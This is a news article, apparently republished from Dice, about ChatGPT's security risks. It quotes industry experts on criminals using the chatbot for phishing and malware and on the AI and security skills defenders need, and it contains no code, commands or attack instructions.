ChatGPT raises cybersecurity and AI concerns

Since its release, ChatGPT, a chatbot capable of producing incredibly human-like text using a sophisticated machine learning model, has industry watchers heralding a new stage in the development of artificial intelligence (AI). ChatGPT’s ability to produce realistic conversations and messages — and to adapt to its mistakes — could have applications in industries ranging from finance to art.

In the three months since Open AI announced ChatGPT, the chatbot generated major headlines and buzz, with up to a million people testing the technology soon after its release. Microsoft has made significant investments in the platform, with a view to possibly by integrating it into its cloud services.

With the excitement of ChatGPT comes a dark side, however, including concerns about security and the ability of cybercriminals to use the chatbot as they see fit. Searching for checkpoints documented several instances of malicious actors deploying much more sophisticated phishing emails written using the chatbot. Other threat actors use technology to create malware.

But the success of these cybercriminal experiments remains to be seen. “It is still too early to decide whether or not ChatGPT functionality will become the new favorite tool for Dark Web participants. However, the cybercriminal community has already shown considerable interest and is jumping into this latest trend to generate malicious code,” Check Point researchers note in their latest report.

For cybersecurity experts, ChatGPT shows how AI is now moving into mainstream use. The growing use of these technologies also means that tech professionals need to start refreshing and strengthening their AI and cybersecurity skills. This is to ensure that they not only develop more secure code as new applications are created, but also to counter what threat actors deploy using these same tools.

“Many organizations are unprepared for how this will change the threat landscape. You have to fight AI with AI, and organizations can seek cloud security that also uses generative AI and AI augmentation technology,” Patrick Harr, CEO of the company, recently told Dice. SlashNext security. “Using these technologies to predict millions of new threat variants that could enter the organization is the only way to counter these attacks to close the security gap and vulnerabilities created by this dangerous trend.”

AI brings unique security risks

Even before the release of ChatGPT, advancements in AI were already disrupting the cybersecurity industry. With information security spending estimated at $187 billion this year, Gartner expects CISOs and other security managers to spend more on AI technologies to protect against attacks that also use the technology.

At the same time, the research firm predicts that “all personnel hired for AI development and the training work will need to demonstrate expertise in responsible AI”

These developments mean tech professionals not only need to understand AI and its use within an organization, but also how developments such as ChatGPT can be quickly adapted by attackers, said Mike Parkin, senior technical engineer. at Vulcan Cyber.

“If someone creates a new and useful tool, someone else will find a way to creatively abuse it. That’s what we’re seeing with ChatGPT now,” Parkin told Dice. “You can ask it to create code that will perform a specific function, like exporting files and then encrypting them. You can ask it to hide this code and then give it to you as an embedded Excel macro. And it will be.

The most immediate threat, especially when it comes to AI technology like ChatGPT, is not that threat actors will use it to immediately create sophisticated malicious code, but rather that they will deploy the chatbot to improve phishing emails, making these malicious messages more realistic and attractive. targets to open.

“Compared to your typical scammer handwriting, ChatGPT is Shakespearean,” Parkin added. “That’s where I see a real threat in this technology. Truly innovative dark code is a kind of art, and ChatGPT isn’t quite there yet. But for conversational situations, it’s already written at a level above and beyond what many threat actors are doing now.

In its review of ChatGPT, the Threat Intelligence team at security firm Tanium came to a similar conclusion: “The main takeaway from ChatGPT is not its destructive nature, but rather the development of interfaces by cybercriminals to help unskilled hackers create very sophisticated campaigns of various types: SMS scams, phishing lures, [business email compromise] attacks, etc.”

Develop skills to respond

The growing use of AI to create phishing emails demonstrates that tech professionals not only need to hone their security skills, but they also need to ensure that their organization trains its employees to help them. spot the telltale signs of these types of attacks.

Cybercriminals tend to be good at using technology to take advantage of skill gaps in their targets, making the organization much more vulnerable, noted Zane Bond, product manager at Keeper Security.

“The most realistic threat from these AI tools is the opportunity for bad actors with limited resources or technical knowledge to attempt more of these large-scale attacks,” Bond told Dice. “Not only can the tools help malicious actors create content such as a credible phishing email or malicious code for a ransomware attack, they can do it quickly and easily. Less defended organizations will be more vulnerable as the volume of attacks will likely continue to increase.

Organizations that have technology professionals who understand AI and how to use it to automate the response to these attacks will have an advantage. This means opportunities for professionals who understand the intersection of AI and cybersecurity.

“Discovering vulnerabilities, especially detecting malware or insider threats, has always been a cat-and-mouse game with adversaries because detection tools typically rely on signatures,” said John Steven, CTO at ThreatModeler in Dice. “As the signatures become effective, the opponents adapt. Generative AI will not change this equation, as it is a weapon that both parties can use in their current workflows. Adversaries will use these tools to create malware that evades detection. Defenders will use it to detect “conceptual” signatures and their generated variants. »

Leave a Reply